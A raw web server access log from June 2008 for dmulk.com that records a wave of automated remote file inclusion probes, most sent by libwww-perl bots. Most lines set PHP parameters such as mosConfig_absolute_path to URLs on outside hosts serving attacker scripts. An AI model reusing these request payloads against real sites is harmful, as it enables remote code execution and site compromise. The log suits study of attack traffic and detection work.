209.250.234.226 - - [25/Jun/2008:11:28:54 -0700] "GET /logs/access_080212.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:28:56 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:28:59 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:29:01 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:29:01 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:29:02 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:29:02 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:11:29:05 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:29:15 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:29:20 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:29:32 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:29:33 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:29:39 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:29:39 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:11:29:47 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:11:29:57 -0700] "GET /logs/errors.php?error=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [25/Jun/2008:11:29:57 -0700] "GET /errors.php?error=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:30:09 -0700] "GET /logs/access_080218.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:12 -0700] "GET //components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:12 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:12 -0700] "GET /logs//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.232.156.10 - - [25/Jun/2008:11:30:15 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.232.156.10 - - [25/Jun/2008:11:30:15 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:30:17 -0700] "GET /logs/access_080418.log//config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.52.130.240 - - [25/Jun/2008:11:30:27 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 200 18539 "-" "libwww-perl/5.810" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:29 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:29 -0700] "GET //components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:30 -0700] "GET /logs//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.22.185 - - [25/Jun/2008:11:30:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:30:36 -0700] "GET /logs/access_080425.log//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:30:47 -0700] "GET /logs/access_080213.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:50 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:52 -0700] "GET /logs/access_071224.log//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:30:55 -0700] "GET /logs/access_071224.log//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:30:56 -0700] "GET /logs/access_080120.log/config.php?path_to_root=http://www.dutadewata.com/bot4id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.54.36 - - [25/Jun/2008:11:31:01 -0700] "GET /blog/index.php/2008/06/?show=gallery&nggpage=3 HTTP/1.0" 200 23184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
61.100.7.111 - - [25/Jun/2008:11:31:02 -0700] "GET /logs/access_080117.log/config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
61.100.7.111 - - [25/Jun/2008:11:31:02 -0700] "GET /config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
61.100.7.111 - - [25/Jun/2008:11:31:02 -0700] "GET /logs/config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:11:31:16 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:11:31:18 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:11:31:32 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:11:31:33 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:11:31:36 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 200 18515 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:31:43 -0700] "GET /logs/access_080211.log/scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.96.139.60 - - [25/Jun/2008:11:31:47 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:32:03 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:32:05 -0700] "GET /index.php?redir=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 200 18429 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:32:06 -0700] "GET /logs/index.php?redir=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:32:07 -0700] "GET /logs/access_080213.log/index.php?redir=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [25/Jun/2008:11:32:16 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.dutadewata.com/bot3-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [25/Jun/2008:11:32:18 -0700] "GET /config.php?path_to_root=http://www.dutadewata.com/bot3-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [25/Jun/2008:11:32:20 -0700] "GET /logs/config.php?path_to_root=http://www.dutadewata.com/bot3-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:32:20 -0700] "GET /logs/access_080218.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:32:24 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:11:32:28 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:32:45 -0700] "GET /logs/access_080213.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:11:32:47 -0700] "GET /config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:11:32:48 -0700] "GET /logs/access_080117.log/config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:11:32:48 -0700] "GET /logs/config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:49 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:49 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:50 -0700] "GET //components/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:50 -0700] "GET //components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:50 -0700] "GET /logs//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:50 -0700] "GET /logs//components/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:32:52 -0700] "GET /scanhttp://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:55 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:55 -0700] "GET //components/errors.php?error=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:32:56 -0700] "GET /logs//components/errors.php?error=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:11:32:59 -0700] "GET /logs/access_080127.log/config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:33:17 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:33:19 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:33:22 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:33:38 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:33:40 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:33:43 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.7.111 - - [25/Jun/2008:11:34:32 -0700] "GET /logs/access_080127.log/config.php?path_to_root=http://dev.librehwdb.tuxfamily.org/l33b1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:34:32 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:34:48 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:35:02 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:35:02 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [25/Jun/2008:11:35:03 -0700] "GET /logs/access_080118.log//components/errors.php?error=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:35:15 -0700] "GET /phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:35:17 -0700] "GET /phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:35:28 -0700] "GET /phphtml.php?htmlclass_path=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:35:33 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:35:33 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:35:36 -0700] "GET /logs/access_071224.log/index.php?content=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:35:38 -0700] "GET /index.php?content=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 18425 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:35:38 -0700] "GET /logs/index.php?content=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:35:42 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.145.165 - - [25/Jun/2008:11:35:42 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
88.84.145.165 - - [25/Jun/2008:11:35:44 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
87.106.57.109 - - [25/Jun/2008:11:35:44 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://death32.com/ss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:36:03 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:36:03 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:36:04 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:11:36:04 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:36:06 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:36:08 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 200 18573 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:36:09 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.10.6.66 - - [25/Jun/2008:11:36:20 -0700] "GET /logs/access_080423.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [25/Jun/2008:11:36:21 -0700] "GET /modifyform.html?code=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:36:22 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:36:31 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:36:33 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:36:57 -0700] "GET /administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:37:04 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:37:04 -0700] "GET /phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:37:04 -0700] "GET /logs/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:11:37:11 -0700] "GET /minamijewelry/html/dream.html HTTP/1.0" 200 18217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.78.4.202 - - [25/Jun/2008:11:37:19 -0700] "GET /logs/access_080218.log/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.78.4.202 - - [25/Jun/2008:11:37:19 -0700] "GET /errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.78.4.202 - - [25/Jun/2008:11:37:19 -0700] "GET /logs/errors.php?error=http://www.quizit.it/wordpress/wp-content/plugins/mygallery/myfunctions/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
